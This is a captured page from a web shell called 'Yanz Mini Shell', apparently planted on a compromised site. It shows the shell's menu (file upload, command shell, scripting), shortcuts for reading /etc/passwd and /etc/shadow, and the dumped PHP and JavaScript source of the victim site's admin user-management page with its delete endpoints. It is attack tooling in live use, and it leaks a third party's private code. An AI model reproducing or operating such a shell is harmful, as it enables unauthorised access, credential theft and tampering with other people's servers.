Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
input-mask
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<?php include "header.php";?> <div class="content-wrapper" style="margin:0px;margin-top:-50px"> <section class="content"> <?php if($session_id=="1"){ ?> <div class="row"> <div class="col-xs-12"> <div class="box box-primary"> <div class="box-header"> <?php if($session_id=="1"){ ?> <a href="users.php" class="btn btn-success btn-sm pull-right"><i class="fa fa-plus-circle"></i> Add New Users</a> <?php } ?> <span class="btn btn-default btn-sm pull-right filter" style="margin-right: 5px;"> Show/Hide Filter</span> <h3 class="box-title">Users List</h3> </div> <div class="box-body"> <div class="row" id="filter"> <b><?//=print_r($_SESSION)?></b> <div class="col-sm-3"> <div class="form-group"> <label class="control-label" for="status">Status</label> <select name="status" class="form-control select2" style="width:100%" id="status"> <option value="Active">Active</option> <option value="In-Active">In-Active</option> <option value="">All Status</option> </select> </div> </div> </div> <div class="clearfix"></div> <div class="table-responsive"> <table id="StData" class="table table-striped table-bordered table-condensed table-hover" style="margin-bottom:5px;"> <thead> <tr class="active"> <th>S.No</th> <th style="width:100px;">Actions</th> <th>Name</th> <th>Mobile Number</th> <th>Email</th> <th>Role</th> <th>Status</th> </tr> </thead> <tbody> <tr> <td colspan="10" class="dataTables_empty"><center> Loading Pls Wait Data</center></td> </tr> </tbody> </table> </div> <div class="clearfix"></div> </div> </div> </div> </div> <?php }else{ ?> <?=$page_not_access?> <?php } ?> </section> <?php include "footer.php";?> <script> $(document).ready(function(){ /* $('#filter').hide();*/ $('.filter').click(function(){ $("#filter").slideToggle(); return false; }); }); </script> <script type="text/javascript"> function getData(){ var status = $("#status").val(); var StData = $('#StData').DataTable( { "processing": true, "serverSide": true, "destroy":true, "ajax":{ url : "data-tables/users-data-table.php", type: "post", data: {status:status}, error: function(){ $(".employee-grid-error").html(""); $("#StData").append('<tbody class="employee-grid-error"><tr><th colspan="10" style="text-align;center;">No data found in the server</th></tr></tbody>'); $("#customers-table_processing").css("display","none"); } } } ); } $(document).ready(function() { getData(); $('#search_table').keyup(function() { getData(); document.getElementById("search_table").focus(); }); $('#status').change(function() { getData(); }); }); function delete_Details(id){ var result = confirm("Confirm Want to In-Active This User?"); if (result) { $.ajax({ type: 'POST', url: 'apis/delete.php', data: {type:'dynamic_in_active',delete_id:id, table: 'tbl_users'}, success: function(response) { console.log(response); getData(); } }); } } function DynamicActive(id){ var result = confirm("Confirm Want to Active This User?"); if (result) { $.ajax({ type: 'POST', url: 'apis/delete.php', data: {type:'dynamic_active',delete_id:id, table:'tbl_users'}, success: function(response) { console.log(response); getData(); } }); } } function delete_HardDetails(id){ var result = confirm("Confirm Want to Hard Delete This User?"); if (result) { $.ajax({ type: 'POST', url: 'apis/delete.php', data: {type:'hard_delete',delete_id:id, table:'tbl_users'}, success: function(response) { console.log(response); getData(); } }); } } function emp_datas(){ <?=$data_table?> } </script>
Free Space : 12117946368 Byte